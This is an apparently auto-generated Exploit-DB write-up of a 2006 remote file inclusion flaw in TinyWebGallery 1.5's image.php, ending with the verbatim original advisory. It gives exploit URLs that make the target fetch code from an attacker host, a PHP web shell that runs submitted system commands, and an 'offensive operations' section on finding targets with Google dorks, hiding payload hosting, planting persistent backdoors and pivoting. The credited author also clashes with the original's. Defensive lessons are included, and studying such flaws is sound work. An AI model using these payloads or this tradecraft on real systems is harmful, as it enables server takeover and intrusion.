By exploitdb papers bot•August 9, 2006•
papers
TinyWebGallery 1.5 Remote File Inclusion Explained
TinyWebGallery 1.5 Remote File Inclusion Explained
What this paper is
This paper details a vulnerability in TinyWebGallery version 1.5. Specifically, it describes a "Remote File Inclusion" (RFI) flaw in the image.php script. This means an attacker can trick the vulnerable script into including and executing code from a remote server.
Simple technical breakdown
The core of the vulnerability lies in how the image.php script handles user input. It takes a parameter named image and uses it directly in an include statement without proper sanitization.
The include statement in PHP is designed to pull in and execute code from another file. When an attacker can control the filename passed to include, they can point it to a malicious script hosted on their own server. The vulnerable script then fetches and runs this remote script, effectively giving the attacker control.
Complete code and payload walkthrough
The provided code snippet is very concise.
<?php
include ($image . ".txt");
?><?php ... ?>: This denotes a block of PHP code.include ($image . ".txt");: This is the critical line.$image: This is a PHP variable. In the context of a web script, this variable is expected to be populated by user input, typically from a URL parameter..: This is the string concatenation operator in PHP. It joins two strings together.".txt": This is a literal string representing the file extension ".txt".include(...): This is a PHP construct. It takes a string as an argument, which is treated as a filename. PHP then attempts to include and execute the content of that file.
Mapping list:
<?php ... ?>-> PHP code block delimiters.include ($image . ".txt");-> The vulnerable function call that attempts to include a file.$image-> User-controlled input variable.$image . ".txt"-> The constructed filename that is passed toinclude.
Exploit Example Breakdown:
The exploit examples provided are:
http://www.site.com/[path]/examples/image.php?image=http://evil_scriptshttp://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
http://www.site.com/[path]/examples/image.php: This is the URL to the vulnerable script on the target website.?image=: This indicates the start of URL parameters.imageis the name of the parameter being passed.http://evil_scripts: This is the attacker-controlled URL. When this is passed to the vulnerableimage.phpscript, the$imagevariable will containhttp://evil_scripts.include ($image . ".txt");becomesinclude ("http://evil_scripts" . ".txt");, which PHP interprets asinclude ("http://evil_scripts.txt");.
If the web server is configured to allow include to fetch remote files (which was common in older PHP configurations), it will attempt to download and execute the content from http://evil_scripts.txt. The attacker would host a malicious PHP script at this URL.
The second example image.php2?image=http://evil_scripts? seems to have a typo in the script name (image.php2 instead of image.php) and an extra ? at the end of the attacker's URL. The core vulnerability remains the same.
Payload:
The "payload" in this context isn't a specific byte sequence like traditional shellcode. Instead, the payload is a malicious PHP script hosted on the attacker's server. When included by the vulnerable TinyWebGallery script, this remote PHP script will execute on the target server.
A common payload for RFI would be a web shell, allowing the attacker to execute commands on the server. For example, the attacker might host a file named evil.txt (or evil.php, depending on how the server processes includes) at http://evil_scripts/evil.txt with content like:
<?php
// Basic web shell
echo "<form method='post'><input type='text' name='cmd'><input type='submit' value='Run'></form>";
if(isset($_POST['cmd'])) {
system($_POST['cmd']);
}
?>When the vulnerable script includes this, the web shell code runs on the target server.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication to the web application is strictly necessary if the vulnerable script is publicly accessible.
- Lab Preconditions:
- A target web server running TinyWebGallery v1.5 (or a similarly vulnerable version).
- The target server must have PHP installed.
- Crucially, the target server's PHP configuration must allow
allow_url_fopenandallow_url_includeto be enabled. These directives control whether PHP can open remote files and include them, respectively. Older PHP versions often had these enabled by default or were misconfigured. - An attacker-controlled server capable of hosting a malicious PHP script.
- Tooling Assumptions:
- A web browser for crafting and sending requests.
- A simple HTTP server (e.g., Python's
http.server,apache,nginx) to host the malicious payload. - A text editor for creating the payload.
- Execution Pitfalls:
allow_url_fopen/allow_url_includedisabled: If these PHP directives are disabled on the target server, the RFI will fail. This is the most common defense against this type of vulnerability.- Incorrect Path: The
[path]in the exploit URL must be correct, pointing to the directory whereexamples/image.phpresides. - File Extension Mismatch: The vulnerability relies on appending
.txt. If the attacker's payload is not named with a.txtextension (e.g.,evil.php), theincludemight fail or execute the file differently depending on server configuration. However, the vulnerability is specifically about the inclusion of the remote file's content, so even if the remote file is.php, the.txtappended might still lead to execution if the server processes.txtfiles as PHP. The most reliable approach is to host the payload with a.txtextension. - WAF/IPS: Web Application Firewalls or Intrusion Prevention Systems might detect and block requests containing URLs in parameters.
- URL Encoding: Special characters in the attacker's URL might need URL encoding.
- Tradecraft Considerations:
- Reconnaissance: Use Google dorks (
"powered by twg") to identify potential targets. Manually verify the TinyWebGallery version. - Payload Hosting: Host the payload on a disposable or anonymized server. Consider using a domain that doesn't immediately link back to the operator.
- Stealth: If the goal is to maintain access, the initial RFI can be used to upload a more persistent backdoor (e.g., a PHP webshell) to the target server itself, rather than relying on the remote include.
- Post-Exploitation: Once a web shell is achieved, pivot to local privilege escalation or lateral movement.
- Reconnaissance: Use Google dorks (
Where this was used and when
- Context: This vulnerability was relevant to websites using TinyWebGallery version 1.5, which was a popular, albeit simple, photo gallery script.
- Approximate Years: The paper was published in 2006. This type of RFI vulnerability was prevalent in web applications developed in the early to mid-2000s, especially those using PHP with less secure default configurations. Exploits targeting RFI were common during this period.
Defensive lessons for modern teams
- Input Validation and Sanitization: Never trust user input. Always validate and sanitize all data received from external sources, especially when it's used in file operations or database queries.
- Secure Configuration: Ensure PHP's
allow_url_fopenandallow_url_includedirectives are disabled on production servers. This is a fundamental security hardening step. - Least Privilege: Configure web servers and applications to run with the minimum necessary privileges.
- Regular Updates: Keep all web applications and their underlying frameworks (like PHP) updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
- Code Review: Conduct regular security code reviews to identify potential vulnerabilities like insecure file inclusion.
ASCII visual (if applicable)
+-----------------+ +--------------------+ +-------------------+
| Attacker Server |----->| Target Web Server |----->| Vulnerable Script |
| (e.g., evil.com)| | (e.g., site.com) | | (image.php) |
+-----------------+ +--------------------+ +-------------------+
^ |
| | (HTTP Request)
| | ?image=http://evil.com/payload.txt
| v
| +-------------------+
| | PHP Interpreter |
| | (allow_url_fopen |
| | enabled) |
| +-------------------+
| |
| | (include)
| v
| +-------------------+
| | Remote File Fetch |
| | (payload.txt) |
| +-------------------+
| |
| | (Execute)
| v
| +-------------------+
| | Malicious Code |
| | Execution |
+------------------| (e.g., Web Shell) |
+-------------------+Source references
- Paper ID: 2158
- Paper Title: TinyWebGallery 1.5 - 'image' Remote File Inclusion
- Author: Mehmet Ince
- Published: 2006-08-09
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2158
- Raw URL: https://www.exploit-db.com/raw/2158
Original Exploit-DB Content (Verbatim)
####################################################
# #
# #
# C Y B E R - W A R R i O R T I M #
# #
# #
####################################################
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:
<?php
include ($image . ".txt");
?>
------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------
Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
###########################################################################
# #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
# #
###########################################################################
# milw0rm.com [2006-08-09]